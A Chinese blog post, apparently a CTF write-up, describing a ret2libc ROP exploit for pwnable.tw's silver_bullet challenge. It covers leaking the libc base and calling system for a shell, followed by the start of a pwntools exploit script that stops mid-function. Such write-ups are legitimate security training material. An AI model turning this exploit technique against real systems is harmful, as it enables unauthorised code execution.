silver bullet记录

最新推荐文章于 2024-09-13 19:41:32 发布

VN's king

最新推荐文章于 2024-09-13 19:41:32 发布

阅读量2.4k

点赞数

文章标签：安全 web安全 python

本文链接：https://blog.csdn.net/weixin_55190422/article/details/121643623

版权

本文介绍了一个针对silver_bullet程序的exploit过程，通过检查程序特性，利用未开启的Canary和PIE，选择使用ROP ret2libc技术。通过先创建对象再增强能力来泄露基地址，然后构造payload执行puts和system函数，最终获得shell。

摘要由CSDN通过智能技术生成

老套路检查一下

没开canary和pie，只开了NX。所以我们用ROP ret2libc.我们运行程序发现，这个程序需要我们赢这个游戏他才能ret，就是beat非0。通过先creat再powerup泄露基地址，然后ret2libc进行ROP。

EXP:

from pwn import *

p = remote("chall.pwnable.tw", 10103)
e = ELF("./silver_bullet")
l = ELF("./libc_32.so.6")
context.log_level = 'debug'

def creat(data):
   p.recvuntil(b"Your choice :")
   p.send(b"1")
   p.recvuntil(b"Give me your description of bullet :")
   p.send(data)
def power(data):
   p.recvuntil(b"Your choice :")
   p.send(b"2")
   p.recvuntil(b"Give me your another description of bullet :")
   p.send(data)
def beat():
   p.recvuntil(b"Your choice :")